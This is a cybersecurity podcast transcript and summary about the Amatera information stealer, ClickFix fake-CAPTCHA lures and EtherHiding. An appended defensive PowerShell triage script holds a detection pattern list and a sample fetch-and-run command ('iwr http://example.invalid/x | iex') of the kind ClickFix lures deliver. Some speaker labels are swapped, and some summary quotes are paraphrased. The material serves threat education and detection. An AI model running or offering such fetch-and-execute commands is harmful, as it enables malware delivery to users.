Selina Larson
You're listening to the Cyberwire network, powered by N2K.
Dave Bittner
Hey everybody. Dave here. I've talked about DeleteMe before and I'm still using it because it still works. It's been a few months now and I'm just as impressed today as I was when I signed up. DeleteMe keeps finding and removing my personal information from data broker sites and they keep me updated with detailed reports so I know exactly what's been taken down. I'm genuinely relieved knowing my privacy isn't something I have to worry about every day. The DeleteMe team handles everything. It's set-it-and-forget-it peace of mind. And it's not just for individuals. DeleteMe also offers solutions for businesses, helping companies protect their employees' personal information and reduce exposure to social engineering and phishing threats. And right now, our listeners get a special 20% off your DeleteMe plan. Just go to JoinDeleteMe.com/N2K and use promo code N2K at checkout. That's JoinDeleteMe.com/N2K, code N2K.
Dave Bittner
Hello everyone, and welcome to the CyberWire's Research Saturday. I'm Dave Bittner and this is our weekly conversation with researchers and analysts tracking down the threats and vulnerabilities, solving some of the hard problems, and protecting ourselves in our rapidly evolving cyberspace. Thanks for joining us.
Selina Larson
One of the main initial access vectors that we have been very closely tracking are web injects, which of course are injects on legitimate but compromised websites that have been observed delivering a variety of different malware. Many of those payloads do tend to be information stealers. And so in this case, we were able to see a malware that became known as Amatera Stealer, or that's what we later identified it as, being delivered via web injects.
Dave Bittner
That's Selina Larson, threat researcher and lead for intelligence analysis and strategy at Proofpoint. The research we're discussing today is titled "Amatera Stealer: Rebranded ACR Stealer with Improved Evasion and Sophistication."
Selina Larson
We also saw a number of samples in open source, like on VirusTotal. Some of our colleagues at other research teams also observed it in other attack chains. But what's really interesting to me is the fact that the stealer landscape right now is so dynamic, and this particular stealer is basically a rebranded stealer known as ACR Stealer. But it's got a lot of updates to it. And I think that one of the most important things from a cybercriminal perspective, especially now in the landscape, is taking a look at information stealers, taking a look at this landscape, trying to figure out, you know, what are threat actors using, how are they developing workarounds for defense, what are the different delivery mechanisms that we're seeing a lot of. Because as we've talked about previously on various podcasts, Dave, the information stealer landscape right now is booming, and that's where it's a very, very serious threat. And so, yeah, so this was an interesting sort of little deep dive that we were able to see about this pretty interesting information stealer.
Dave Bittner
So you mentioned ACR Stealer. What set Amatera Stealer apart, that it's not just a variant of ACR, that it is its own unique thing?
Selina Larson
Yeah, so there are significant portions of code overlap that exist with ACR Stealer analysis in the public. And so that's kind of where we're like, oh, is this just updated ACR? But it's really featured a full rebrand. So Amatera Stealer is actually sold as malware-as-a-service, which is what we see from a lot of these very prominent information stealers. Lumma, for example, was pretty much the most popular malware-as-a-service in terms of the information stealer ecosystem. And then it got disrupted. And so that's also, we can, you know, talk about that as part of this conversation too. But that's, you know, why we're kind of keeping an eye on how the infostealer landscape is moving. But what we did find was this particular malware had a bunch of new interesting anti-analysis features. There was some improved sophistication of the malware. The command and control operates a lot differently. The actual place where you can purchase it or manage it from, you know, the panel, we were able to get eyes on a panel, it's called Amatera Stealer. So you know, you can actually see like the payment structure and the tier structure. And what was interesting is that back in July of 2024, for the ACR support channel, which is of course on Telegram, as many of these things are, basically they said, you know, we're not going to sell ACR Stealer anymore. You know, we're closed for an indefinite period, but you know, there will be no problems. We do not say goodbye. This is of course all in Russian, but we included a machine-translated version of that message. But so I said, okay, this is not goodbye. And so then come around December, towards the end of last year, this new ACR, or new ACR Amatera Stealer, sort of popped up. And the panel began surfacing. And so we were able to kind of see some of those overlaps in terms of the timeline of the stealer and the sort of the rebrand with a bunch of new features.
Dave Bittner
I see, so your belief is that this is the same group who created ACR Stealer. This is an updated version.
Selina Larson
Mm, okay. Yeah, got it.
Dave Bittner
Yeah. So the research talks about how Amatera is distributed via ClearFake campaigns and also these ClickFix techniques. For anyone in our audience who might not be familiar with ClickFix, can you give us a quick description of how that works?
Selina Larson
Yeah, of course. And I do, you know, I have to say I recognize that it's very tough to keep a full understanding of the threat landscape. We're saying things like ClearFake and ClickFix. And, you know, we talk about this technique called EtherHiding and all these things. And certainly ClearFake is just one of many types of web inject campaigns. So, you know, I just want to say that if you're wondering what is ClearFake, I've never heard of this before. You know what? That is totally fine.
Dave Bittner
Because don't let your imposter syndrome kick in. Because it's not you.
Selina Larson
No, it's the landscape. It's so crazy right now. Like, the amount of web inject campaigns that we're seeing, many of which use the ClickFix technique, which I'll describe in just a second. So there's so many out there. So, yeah, so ClickFix is actually a really interesting social engineering technique whereby threat actors will either through web injects or, you know, direct URLs or in some way essentially show you this dialog that says you need to update for security purposes or, oh, you need to solve this CAPTCHA to actually access this content. And what that basically does is it tricks users into copying, pasting and running PowerShell on their own host. So what we saw, for example, with this ClearFake campaign, and again, ClearFake is a type of web inject campaign, is that when they go to a website that's compromised by ClearFake injects, they were presented with this fake CAPTCHA. So it says, complete these verification steps to prove you're not a robot. And then the instructions that it actually gives you are numbered 1, 2 and 3. One is press and hold the Windows key plus R. And then in the verification window, press Ctrl+V and then press Enter. So it's literally these step-by-step, this is how to do this. But ultimately, what it is, you're running a ClickFix PowerShell command. So it's ClickFix. The technique is this click to fix, basically copying, pasting and running PowerShell. And this is something that we've seen from just tons of actors. It's completely overtaken the landscape.
Dave Bittner
Yeah, I mean it really seems like it is the flavor of the month right now, right?
Selina Larson
Oh absolutely, yeah. And we've even seen it with espionage threat actors using this sort of ClickFix technique. We see a lot of different sort of styles of the ClickFix technique. We see it with just, of course, you know, update your Chrome browser. Of course we see it with that. We see the CAPTCHA, prove you're not a robot. But we've even seen it with very specific and customized software that a specific target might be using for transportation and logistics, for instance. And it'll be like, oh, you have to update this very specific software. So threat actors are taking this idea of the ClickFix technique to copy, paste and run PowerShell on a host and just making it unique for whatever their purposes are. I think that that is one interesting part of this whole story, actually. Is this ClickFix technique just exploding all across the landscape, where you have these web inject threat actors like ClearFake, LandUpdate, a lot of the other threat actors that were trying ZPHP, a lot of these different clusters are using these sort of fake web inject style things. Compared with ClickFix, we see it with email threat actors as well, distributing URLs in ClickFix. It's just everywhere. It's like that meme. It's like ClickFix, ClickFix everywhere. Used to see it, the Toy Story meme. It's like it's everywhere.
Dave Bittner
Right. Which we assume means that they're seeing great success with it.
Selina Larson
That is how I am interpreting this. I mean, yeah, the thing is, typically when you see an explosion of a technique proliferate like this across the landscape, it tends to be very effective. I mean, you know, we're not going to see all of these actors using the same technique if it's not working, which is what actually kind of, you know, it kind of freaks me out. And they're well-designed lures too. Like I have to say, it's a believable CAPTCHA if you don't really know the steps that you're taking or whatever. It is pretty believable.
Dave Bittner
So earlier in our conversation you alluded to this technique called EtherHiding. Can you unpack that one for us?
Selina Larson
So EtherHiding is kind of interesting. Basically it uses something called a Binance smart contract that has this JavaScript stored in that smart contract, and then that is what will kind of generate the CAPTCHA and the malicious command on the actual host. And what the actor can do is modify the smart contract instead of the inject itself, basically. And it's kind of complicated, and it's really just like the ClearFake cluster is one of the only ones that we see regularly kind of adopting this EtherHiding technique. But it's essentially using the blockchain to store this command in a way that they can, you know, update that when they need to. And then oftentimes they might just leave it and not modify it at all. So it's kind of, yeah, it's basically you can block the domain on which the script is actually hosted, which is like the actual smart contract. And that is kind of what the threat actor is using as opposed to, you know, injecting the JavaScript directly on the website, for example. There's a lot of different techniques that web inject threat actors use, and EtherHiding is one of them that we see with ClearFake.
Dave Bittner
We'll be right back. Compliance regulations, third-party risk and customer security demands are all growing and changing fast. Is your manual GRC program actually slowing you down? If you're thinking there has to be something more efficient than spreadsheets, screenshots and all those manual processes, you're right. GRC can be so much easier, and it can strengthen your security posture while actually driving revenue for your business. You know, one of the things I really like about Vanta is how it takes the heavy lifting out of your GRC program. Their trust management platform automates those key compliance, internal and third-party risk, and even customer trust workflows, so you're not buried under spreadsheets and endless manual tasks. Vanta really streamlines the way you gather and manage information across your entire business. And this isn't just theoretical. A recent IDC analysis found that compliance teams using Vanta are 129% more productive. That's a pretty impressive number. So what does it mean for you? It means you get back more time and energy to focus on what actually matters, like strengthening your security posture and scaling your business. Vanta GRC. Just imagine how much easier trust can be. Visit vanta.com/cyber to sign up today for a free demo. That's V-A-N-T-A.com/cyber. And now a word from our sponsor, Cloudrange. At Cloudrange they believe cybersecurity readiness starts with people, not just technology. That's why their proactive simulation-based training helps security teams build confidence and skill from day one by turning potential into performance. They empower SOC and incident response teams to respond quickly, smartly, and in sync with evolving threats. Learn how Cloudrange is helping organizations stay ahead of cyber risks at www.cloudrange.com. So what are Amatera's goals once it lands on a victim's machine? What sort of data is it looking to steal?
Selina Larson
Yeah, so as you might imagine, stealers nowadays just have a lot of different capabilities. Of course, you know, they're going after passwords, they're going after crypto wallets, stealing files on disk, browser cookies, web forms, things like that. And then of course you have Amatera Stealer that is also capable of running secondary payloads. So it could potentially download and execute files like executables, or it can download and execute PowerShell. So it has both the stealing functionality as well as the ability to run follow-on payloads.
Dave Bittner
Is the malware's configuration static or does it have the ability to dynamically adapt?
Selina Larson
So what's actually interesting is it used to do command and control using Steam or Telegram dead drops, which we see a lot of times with various stealers. We actually covered it before in one of our blog posts with Vidar Stealer, for example, where they will regularly use Steam or Telegram for command and control. But in this case they actually started using NtSockets for command and control. And so this kind of increases the stealthiness of the C2 communication. So the way that the command and control is set up, it kind of bypasses commonly used Windows networking APIs, which a lot of times your endpoint detection analysis tool will rely on for visibility into the HTTP request. Another thing that's kind of interesting in terms of the malware capability is not using DNS, so it will use C2 via IP. And the IP address in the cases that we were looking at was not owned by a threat actor, but was using a CDN endpoint address. In this case it was Cloudflare. So yeah, so it has a little bit of interesting C2 communications that make it a little bit tricky. So for example, if they're using an IP address that's associated to a public CDN like Cloudflare, security operations might be reluctant to just block the IP address by default. Right. It's not like you can just block a C2 domain that we often see used for malware command and control. But you know, with an IP that belongs to this, like, public CDN that's probably used by a lot of different things, it might be like, okay, you know, we might not block this because it could be used by legitimate websites that are also using the CDN. In addition to that, not using a domain name or DNS for C2 also means that it can't be blocked or alerted on through DNS monitoring. So there's no DNS lookup for the domain name. So there's some of these other sort of like C2 functionalities that are trying to evade detection in a way that previous examples of similar malware you don't necessarily see.
Dave Bittner
Well, we mentioned Lumma Stealer earlier. When we're looking at the landscape here, Lumma Stealer was disrupted. Do we think that Amatera is stepping in to fill that gap?
Selina Larson
So I feel like it's a little bit early to say yes or no. But I do want to point out in terms of the actual pricing structure with Amatera and how, because these MaaS, which is such a funny word, malware-as-a-service, MaaS offerings, the way that they work, right, is that you pay to be able to access and use the information stealer. Lumma is very similar, and it's actually not too expensive. So, you know, for three months for 500 bucks, or like a full year for 1500 bucks. Like, this is the pricing information for the publicly accessible panel we were able to see. And so, you know, I think that first of all, having a MaaS offering can sometimes lower the barrier to entry for a lot of cybercriminals. But also it does sort of enter the scene at this moment where people might be leaving Lumma Stealer. For a variety of reasons, Lumma isn't fully eradicated. Right. Like, a lot of the infrastructure was disrupted. It was obviously a big win for law enforcement and private sector. But we're still seeing some Lumma activity even after the takedown. Certainly not what it was. But what's great about a lot of these disruptions, in addition to actually disrupting infrastructure, doing takedowns, all of that stuff, is it really makes it so that the criminal who's operating this doesn't have the same sort of trust and brand recognition and, like, authority in the marketplace. Right? And so what you often see when these things happen is you'll have the criminals who are using whatever the malware is go to greener pastures, so to speak. You know, maybe malware that isn't quite so under the microscope, maybe they try and build their own thing. Maybe they stop doing crime, which is the ideal outcome.
Dave Bittner
Yeah. What an adorable thought.
Selina Larson
I know, in a perfect world, if you're like, a criminal is doing crime and then the tool that they're using gets, like, busted and targeted by law enforcement. Like, imagine if they decide to change their behavior and change their time for.
Dave Bittner
Me to step back and rethink my life.
Selina Larson
Right? Yeah. Like, oh, okay, maybe I can go in a different direction here. So, yeah, so I think, you know, the market is now, I think, a little bit more open for some of these people who are like, okay, do I not trust Lumma Stealer anymore because it was a target of law enforcement disruption? Should I be spending money elsewhere? And, you know, if I was a malware author marketing my, you know, malware-as-a-service, I'd be like, hey, I'm not that guy.
Dave Bittner
Right?
Selina Larson
Right. Yeah. Like, I don't have, you know, law enforcement breathing down my neck with all of these, you know, big blogs and reporting coming out about how I operate and all these things that have been taken down and, you know, made my life a little bit challenging. So yeah, I think it is an opportunity for cybercriminals to find, okay, what's next? But that's why it's so important to really be sort of monitoring on top of the information stealer landscape. Because certainly Lumma was big and popular, but it's not the only one. And certainly what we're seeing with Amatera Stealer, for example, is it's under active development. So, you know, we're seeing them continuously modifying, updating, making changes to this malware to make it, from their perspective, better, more effective, more useful for the cybercriminal operators. And of course, you know, we wrote a bunch of detections for it, we have coverage for it, published some rules associated with it, but it's, you know, it's very important to sort of stay on top of these things because they are under active development. And at any point something like the Lumma disruption could happen and everyone flocks to something else. So I do think it's still too early to say for sure, like, this is definitely replacing Lumma Stealer, but, you know, having other options on the market and making sure that we have detections and defense against it is super important.
Dave Bittner
So what's your recommendation then for defenders? How should a security team go about protecting themselves against this?
Selina Larson
Yeah, so first of all, update. Make sure you have existing network signatures that will detect this traffic and the command and control, check-in and exfiltration traffic, things like that. There are rules that we published that are associated with this. One thing that I really, really want to make sure to hammer home is that people are aware of and incorporate the ClickFix technique into their existing security training. Making sure that people are aware of the new types of social engineering and techniques that are being used by threat actors is very, very important. Also restricting your average user from running unauthorized PowerShell is really important here, because literally copying, pasting, running PowerShell is like they're infecting themselves, and making it so that end users can't do that is something that is very important. And yeah, I think those are kind of the two main things: make sure that you're aware that this is happening and, you know, practice defense in depth and make it so that users can't be running PowerShell. There are other ways that we've seen Amatera delivered as well. So, you know, things like SEO poisoning, fake software downloads, things like that. So that's also very, very important. Restricting downloads from unknown domains, unrecognized domains, really, you know, block traffic especially from newer, just-registered domains, things like that are impersonating enterprise software, for example, and also not downloading unauthorized software. So oftentimes you'll see a lot of information stealers masquerading as, for example, a VPN app or a PDF reader or a document reader, things like that. And so, you know, restricting the downloads from those types of tooling, and making sure if you need something like a PDF reader, go to your IT department and ask for that, is I think important to note here as well.
So user education I think is really important and really big. But also making sure that you as an organization have defense in depth, and if a user does take an unsafe action, then they're blocked from the subsequent actions that could happen as a result of that activity.
Dave Bittner
Our thanks to Selina Larson from Proofpoint for joining us. The research is titled "Amatera Stealer: Rebranded ACR Stealer with Improved Evasion and Sophistication." We'll have a link in the show notes. And that's Research Saturday, brought to you by N2K CyberWire. We'd love to hear from you. We're conducting our annual survey to learn more about our listeners. We're collecting your insights through the end of this summer. There's a link in the show notes. Please do check it out. This episode was produced by Liz Stokes. We're mixed by Elliot Keltzman and Trey Hester. Our executive producer is Jennifer Iban, Peter Kilpe is our publisher and I'm Dave Bittner. Thanks for listening. We'll see you back here next time. Crogl is AI built for the enterprise SOC, fully private, schema-free and capable of running in sensitive air-gapped environments. Crogl autonomously investigates thousands of alerts weekly, correlating insights across your tools without data leaving your perimeter. Designed for high availability across geographies, it delivers context-aware, auditable decisions aligned to your workflows. Crogl empowers analysts to act faster and focus on critical threats, replacing repetitive triage with intelligent automation to help your SOC operate at scale with precision and control. Learn more at crogl.com. That's C-R-O-G-L.com.
CyberWire Daily – Episode: "Click Here to Steal" [Research Saturday]
Release Date: July 12, 2025
Host: N2K Networks
In this episode of CyberWire Daily's Research Saturday, host Dave Bittner engages in an in-depth discussion with Selina Larson, a threat researcher and lead for intelligence analysis and strategy at Proofpoint. The conversation centers around the evolving landscape of information stealer malware, with a particular focus on the emergence of Amatera Stealer, its rebranding from ACR Stealer, and the sophisticated techniques employed by cybercriminals to evade detection.
Timestamp: [02:26]
Selina Larson introduces Amatera Stealer, a malware that originated as a rebranded version of ACR Stealer. She emphasizes the significance of this transformation:
"The stealer landscape right now is so dynamic... this was an interesting sort of little deep dive that we were able to see about this pretty interesting information stealer."
— Selina Larson [02:26]
Key Points:
- Amatera Stealer shares significant code with ACR Stealer but is a full rebrand, sold as malware-as-a-service through its own panel with tiered pricing.
- The ACR Stealer Telegram support channel announced in July 2024 that sales were closed "for an indefinite period"; the Amatera panel surfaced around December 2024.
- Proofpoint observed the stealer delivered via web injects on compromised websites; samples also appeared on VirusTotal and in attack chains seen by other research teams.
Timestamp: [06:08]
The discussion shifts to the distribution methods used by Amatera Stealer, highlighting the prevalence of ClearFake campaigns and the ClickFix technique.
"ClickFix is basically copying, pasting and running PowerShell. And this is something that we've seen from just tons of actors. It's completely overtaken the landscape."
— Selina Larson [07:11]
ClearFake Campaigns:
- ClearFake is one of many web inject clusters; visitors to a compromised site are shown a fake CAPTCHA asking them to "complete these verification steps to prove you're not a robot."
ClickFix Technique:
- The lure walks the user through numbered steps (Windows key + R, then Ctrl+V, then Enter), so the victim pastes and runs a PowerShell command on their own host.
- Variants include fake Chrome updates and fake updates for niche line-of-business software; the technique is used by web inject clusters (ClearFake, LandUpdate, ZPHP), by email threat actors distributing URLs, and by espionage actors.
Timestamp: [10:55]
Selina introduces EtherHiding, a technique used in conjunction with ClearFake campaigns to make the inject harder to take down.
"EtherHiding uses a Binance smart contract that has JavaScript stored within, which generates the CAPTCHA and the malicious command on the host."
— Selina Larson [11:02]
Mechanism:
- JavaScript is stored in a Binance smart contract; that script generates the fake CAPTCHA and the malicious command on the victim's host.
- The actor updates the smart contract rather than the inject on the compromised site, and often leaves it unchanged for long stretches.
- Among the clusters Proofpoint tracks, ClearFake is one of the only ones regularly using EtherHiding.
Timestamp: [15:17]
The conversation delves into the operational aspects of Amatera Stealer, outlining its data exfiltration goals and C2 communications.
"Amatera Stealer is capable of running secondary payloads, downloading and executing executables or PowerShell commands."
— Selina Larson [15:17]
Data Targets:
- Passwords, cryptocurrency wallets, files on disk, browser cookies and web form data.
- Secondary payloads: the stealer can download and execute executables or PowerShell.
C2 Strategies:
- Earlier versions used Steam or Telegram dead drops (a pattern Proofpoint has also documented for Vidar Stealer); Amatera moved to NtSockets, bypassing the Windows networking APIs that endpoint tools rely on for HTTP visibility.
- C2 is reached by IP address rather than a domain, so there is no DNS lookup to monitor or block; the IP observed belonged to a Cloudflare CDN endpoint, which security teams may hesitate to block outright.
Timestamp: [18:13]
The discussion assesses whether Amatera Stealer is poised to fill the void left by the disrupted Lumma Stealer.
"The market is now a little bit more open for some of these people who are like, okay, do I not trust Lumma Stealer anymore... What we're seeing with Amatera is it's under active development."
— Selina Larson [19:48]
Insights:
- Pricing seen on the publicly accessible panel: about $500 for three months or $1,500 for a year, which lowers the barrier to entry.
- Lumma Stealer activity continued after the takedown at a reduced level, but the disruption damaged its trust and brand recognition with criminal customers.
- Amatera is under active development; Proofpoint has published detections, but it is too early to say it is replacing Lumma.
Timestamp: [22:37]
Selina offers strategic advice for defenders to safeguard against threats like Amatera Stealer.
"Incorporate the ClickFix technique into your existing security training and restrict users from running unauthorized PowerShell."
— Selina Larson [22:44]
Key Strategies:
- Deploy network signatures for C2 check-in and exfiltration traffic (Proofpoint has published rules).
- Add the ClickFix technique to existing security awareness training.
- Restrict ordinary users from running unauthorized PowerShell.
- Block downloads from unknown and newly registered domains, especially those impersonating enterprise software, and route requests for software such as VPN clients or PDF readers through IT.
- Practice defense in depth so that a single unsafe user action is blocked at the next step.
The episode underscores the dynamic and evolving nature of the information stealer ecosystem, with Amatera Stealer exemplifying the advanced tactics employed by cybercriminals to sustain and enhance their operations. Selina Larson’s insights provide a comprehensive overview of the current threats and actionable strategies for organizations to bolster their defenses against such sophisticated malware.
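The ClickFix steps described in the episode (Windows key + R, Ctrl+V, Enter) leave the pasted command in the Win+R history of the victim's user profile, which gives responders a cheap place to look. The script below is an added example written for this summary; it is not code from Proofpoint or from the episode. It assumes a Windows host, reads the standard Explorer RunMRU key, and flags entries matching a pattern list that is this example's own choice. It also shows one blunt preventive control, the "Remove Run menu from Start Menu" user policy, as a complement to the PowerShell restrictions the episode recommends rather than a substitute for them.

```powershell
# Added example (not from the Proofpoint research or the N2K episode).
# Hunts for ClickFix residue in the Win+R history and optionally disables the Run dialog.

$RunMruPath = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'

# Indicators typical of copy/paste-and-run lures. The list is an assumption; extend it locally.
$SuspiciousPatterns = @(
    'powershell', 'pwsh', 'mshta', 'cmd(\.exe)?\s', 'rundll32', 'certutil',
    'iwr\b', 'invoke-webrequest', 'irm\b', 'invoke-restmethod',
    'iex\b', 'invoke-expression', 'curl\b', '-enc', 'frombase64string',
    '-w(indowstyle)?\s+hidden', 'https?://'
)

function Get-RunMruEntries {
    # Returns each Win+R history entry, most recent first, with Explorer's trailing "\1" stripped.
    param([string]$Path = $RunMruPath)
    if (-not (Test-Path $Path)) { return @() }
    $key = Get-ItemProperty -Path $Path
    $order = if ($key.MRUList) { $key.MRUList.ToCharArray() } else { @() }
    foreach ($letter in $order) {
        $name = [string]$letter
        $raw = $key.$name
        if ($null -ne $raw) {
            [pscustomobject]@{ Slot = $name; Command = ($raw -replace '\\1$', '') }
        }
    }
}

function Find-ClickFixArtifacts {
    # Emits only the entries that match at least one suspicious pattern, with the matched indicators.
    param([object[]]$Entries)
    $regex = '(?i)(' + ($SuspiciousPatterns -join '|') + ')'
    foreach ($e in $Entries) {
        $hits = [regex]::Matches($e.Command, $regex) |
            ForEach-Object { $_.Value.ToLower() } | Sort-Object -Unique
        if (@($hits).Count -gt 0) {
            [pscustomobject]@{
                Slot       = $e.Slot
                Command    = $e.Command
                Indicators = (@($hits) -join ',')
            }
        }
    }
}

function Disable-RunDialog {
    # Applies the "Remove Run menu from Start Menu" user policy, which also disables Win+R.
    # Coarse control for the ClickFix flow only; AppLocker/WDAC and Constrained Language Mode
    # are what actually restrict PowerShell, per the episode's recommendation.
    $pol = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'
    if (-not (Test-Path $pol)) { New-Item -Path $pol -Force | Out-Null }
    Set-ItemProperty -Path $pol -Name NoRun -Value 1 -Type DWord
}

# Constructed sample entries shaped like a ClickFix paste (not captured data), so the
# detection logic can be exercised without a compromised host.
$Sample = @(
    [pscustomobject]@{ Slot = 'a'; Command = 'notepad' },
    [pscustomobject]@{ Slot = 'b'; Command = 'powershell -w hidden -c "iwr http://example.invalid/x | iex"' },
    [pscustomobject]@{ Slot = 'c'; Command = 'mstsc' }
)

Find-ClickFixArtifacts -Entries $Sample | Format-Table -AutoSize

# On a live host, run against the real history instead of the sample:
# Find-ClickFixArtifacts -Entries (Get-RunMruEntries)
```

Run it in the context of the user who was lured, since RunMRU lives under HKCU; for an offline image, load the user's NTUSER.DAT hive and point `$RunMruPath` at it. Against the constructed sample only slot "b" is returned, with indicators such as `powershell`, `-w hidden`, `iwr`, `http://` and `iex`. A clean RunMRU does not prove the host was not infected, because some lures clear the history or use a different launcher; it is a fast triage check, not a verdict.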
Notable Quotes:
Produced by: Liz Stokes
Mixed by: Elliot Keltzman and Trey Hester
Executive Producer: Jennifer Iban
Publisher: Peter Kilpe
Host: Dave Bittner
This summary provides a comprehensive overview of the "Click Here to Steal" episode, capturing the essential discussions and insights shared by Selina Larson on the evolving threats posed by Amatera Stealer and the strategies to combat them.